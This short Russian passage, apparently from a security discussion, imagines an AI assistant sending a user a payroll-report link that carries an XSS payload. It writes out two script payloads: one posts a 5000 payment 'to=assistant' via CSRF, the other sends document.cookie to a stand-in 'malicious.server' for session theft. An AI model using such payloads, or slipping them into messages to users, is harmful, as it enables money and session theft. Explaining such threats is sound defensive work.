"Привет, midhun lc,
Я создал отчет о зарплате, который вы просили, найдите его [здесь].
С уважением, Ваш помощник"
[здесь] естьссылка, которая указывает на https://payrollapplication/reportid=<script>$.post('https://payrollapplication/send_payment?amount=5000&to=assistant')</script>
(Очевидно, это также использует CSRF.)
Или [здесь] - ссылка, указывающая на https://payrollapplication/reportid=<script>$.post('malicious.server/?receive=' + document.cookie)</script>
для кражи сеанса и других файлов cookie.(Это также использует слабые флаги cookie.)
Или он может просто отправлять любые данные из приложения payrollapplication, к которым жертва может получить доступ.
И так далее.Как именно полезная нагрузка попадает к жертве, конечно, может отличаться.Он может быть во внутреннем документе, отправлен по электронной почте и т. Д.